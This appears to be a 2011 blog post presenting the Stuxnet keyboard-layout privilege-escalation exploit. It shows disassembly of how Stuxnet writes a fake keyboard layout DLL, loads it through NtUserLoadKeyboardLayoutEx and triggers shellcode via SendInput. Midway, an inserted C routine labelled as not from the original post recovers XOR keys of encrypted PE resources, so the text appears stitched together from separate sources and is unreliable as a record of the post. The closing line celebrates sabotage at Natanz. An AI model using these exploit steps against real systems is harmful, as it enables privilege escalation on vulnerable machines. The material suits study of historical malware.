To inaugurate 2011 I decided to release the exploit code for one of the EoP vulnerabilities exploited by Stuxnet. Stuxnet. What else could we say? It was the best gift of 2010. Stuxnet used this flaw to escalate privileges on XP/2K boxes. It's stored in resource 250, XORed. Can you guess the key? ;)
After performing several paranoid checks to avoid unsuccessful exploitation (detailed by VUPEN), the party starts...
The vulnerability has already been explained elsewhere, so just a couple of notes on Resource250.dll:
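As an added example (this is not Stuxnet's code and not from the original post): a small C routine that recovers the XOR key of an encrypted PE resource such as resource 250 without guessing. It assumes the resource is XORed byte-wise with a single repeating key byte, which the post does not confirm, and the 0x48-byte sample buffer and the key 0xA5 are constructed here for illustration. The trick is that a one-byte key is fixed by the 'M' of the "MZ" header alone; the 'Z', e_lfanew and the "PE\0\0" signature only confirm that the candidate is right.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Added example, not Stuxnet's code. Assumes the resource is a PE image
   XORed with a single repeating byte; the real key is not given here. */

#define E_LFANEW_OFF 0x3C   /* offset of e_lfanew in IMAGE_DOS_HEADER */

/* XOR every byte of src into dst with a one-byte key. */
static void xor_buf(uint8_t *dst, const uint8_t *src, size_t len, uint8_t key)
{
    for (size_t i = 0; i < len; i++)
        dst[i] = src[i] ^ key;
}

/* Read a little-endian 32-bit value whose bytes are still XORed with key. */
static uint32_t read_le32_xored(const uint8_t *p, uint8_t key)
{
    return (uint32_t)(p[0] ^ key)
         | (uint32_t)(p[1] ^ key) << 8
         | (uint32_t)(p[2] ^ key) << 16
         | (uint32_t)(p[3] ^ key) << 24;
}

/* Recover the single-byte XOR key of an encrypted PE image.
   The first byte fixes the only candidate (plaintext must be 'M');
   'Z', e_lfanew and "PE\0\0" then confirm it.
   Returns the key (0..255) or -1 if the buffer does not decrypt to a PE. */
int recover_pe_xor_key(const uint8_t *buf, size_t len)
{
    if (len < E_LFANEW_OFF + 4)
        return -1;
    uint8_t key = buf[0] ^ 'M';
    if ((buf[1] ^ key) != 'Z')
        return -1;
    uint32_t e_lfanew = read_le32_xored(buf + E_LFANEW_OFF, key);
    if (e_lfanew > len - 4)   /* must leave room for the 4-byte signature */
        return -1;
    const uint8_t *pe = buf + e_lfanew;
    if ((pe[0] ^ key) != 'P' || (pe[1] ^ key) != 'E' ||
        (pe[2] ^ key) != 0   || (pe[3] ^ key) != 0)
        return -1;
    return key;
}

/* Constructed sample (hypothetical): a 0x48-byte stub with a DOS header
   whose e_lfanew points at a "PE\0\0" signature, XORed with the given key.
   Stand-in for a real encrypted resource; only the headers matter here. */
#define SAMPLE_LEN 0x48
#define SAMPLE_KEY 0xA5

size_t build_encrypted_sample(uint8_t *out, uint8_t key)
{
    uint8_t plain[SAMPLE_LEN];
    memset(plain, 0, sizeof plain);
    plain[0] = 'M'; plain[1] = 'Z';
    plain[E_LFANEW_OFF] = 0x40;                 /* e_lfanew = 0x40, little-endian */
    memcpy(plain + 0x40, "PE\0\0", 4);
    plain[0x44] = 0x4c; plain[0x45] = 0x01;     /* Machine = IMAGE_FILE_MACHINE_I386 */
    xor_buf(out, plain, SAMPLE_LEN, key);
    return SAMPLE_LEN;
}

/* Encrypt the constructed sample, then recover the key from ciphertext alone. */
int demo_recover_key(void)
{
    uint8_t enc[SAMPLE_LEN];
    size_t n = build_encrypted_sample(enc, SAMPLE_KEY);
    return recover_pe_xor_key(enc, n);
}

int main(void)
{
    return demo_recover_key() == SAMPLE_KEY ? 0 : 1;
}
```

If the key turns out to be longer than one byte, the same idea still works: the DOS header is mostly zero padding, so the ciphertext between offsets 0x02 and 0x3B leaks the key stream directly and the "PE\0\0" check confirms the period.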
.text:10001082 test si, si
.text:10001085 jnz short loc_100010A9
.text:10001087 push [ebp+var_4]
.text:1000108A lea eax, [ebp+var_44]
.text:1000108D push eax
.text:1000108E call GoGoGo
Stuxnet creates a temporary file and writes into it a minimalistic fake keyboard layout DLL (0x246 bytes, per the WriteFile call below), built so that win32k!ReadLayoutFile swallows it without complaint.
.text:10001FC6 loc_10001FC6: ; CODE XREF: CreateFakeKbdLayoutFile+CFj
.text:10001FC6 push ebx
.text:10001FC7 lea eax, [ebp+var_4]
.text:10001FCA push eax
.text:10001FCB push 246h
.text:10001FD0 push offset unk_1000B058; fake Keyboard Layout Dll
.text:10001FD5 push esi
.text:10001FD6 call WriteFile
Then it is ready to trigger the vuln and execute the shellcode.
.text:10002A63 push [ebp+var_8]
.text:10002A66 push edi
.text:10002A67 push esi
.text:10002A68 push [ebp+arg_0]
.text:10002A6B push [ebp+var_4]
.text:10002A6E call TriggerVuln
...
.text:100027F3 push 101h
.text:100027F8 push [ebp+var_8]
.text:100027FB push eax
.text:100027FC push [ebp+var_4]
.text:100027FF push 1AE0160h
.text:10002804 push [ebp+arg_10]
.text:10002807 call LoadFakeKBDviaNtUserLoadKeyboardLayoutEx
Finally, a call to SendInput:
.text:10002839 push 1Ch
.text:1000283B lea eax, [ebp+var_50]
.text:1000283E push eax
.text:1000283F push ebx
.text:10002840 mov [edi+38h], esi
.text:10002843 call SendInput
At this point the shellcode is executing. Every time this code runs, God breaks something in Natanz.